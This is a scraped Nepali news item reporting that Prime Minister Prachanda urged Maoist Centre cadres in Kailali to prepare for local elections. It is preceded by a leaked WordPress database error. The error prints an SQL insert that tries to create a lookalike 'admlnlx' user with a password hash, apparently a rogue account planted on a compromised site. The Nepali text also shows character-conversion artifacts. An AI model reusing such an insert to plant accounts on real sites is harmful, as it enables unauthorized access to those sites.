WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYPxuD4YPpsQfgPTuoAOAF./p507sf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:39:21', '', 'admlnlx', 'admlnlx')
धनगढी, मंसिर २३ –
प्रधानमन्त्री एवम् नेकपा ९माओवादी केन्द्र०का अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ले स्थानीय निकायको निर्वाचनको तयारीमा लाग्न कार्यकर्तालाई निर्देशन दिनुभएको छ ।
कैलालीको गेटामा आज आयोजित पार्टीको प्रदेशस्तरीय अन्तक्र्रिया तथा प्रशिक्षण कार्यक्रममा बोल्दै प्रधानमन्त्री दाहालले स्थानीय निकायको निर्वाचन नयाँ संरचनाअनुसार गरिने बताउनुभयो ।
उहाँले लोकतान्त्रिक गणतन्त्रलाई संस्थागत गर्न पनि चुनाव अपरिहार्य रहेको उल्लेख गर्दै यदि नयाँ बन्ने संरचनाअनुसार चुनाव गर्ने सवालमा सहमति हुन नसकेमा पुरानै संरचनाको स्थानीय निकायको चुनाव गर्न पनि तयार हुनुपर्नेमा जोड दिनुभयो । उहाँले व्यवस्थापिका–संसद्मा दर्ता भएको संविधान संशोधन विधेयक फिर्ता नहुने दोहो¥याउनुभयो ।
प्रशिक्षणमा ७ नं प्रदेशका नेकपा ९माओवादी केन्द्र०का नेता कार्यकर्ताको सहभागिता थियो । – रासस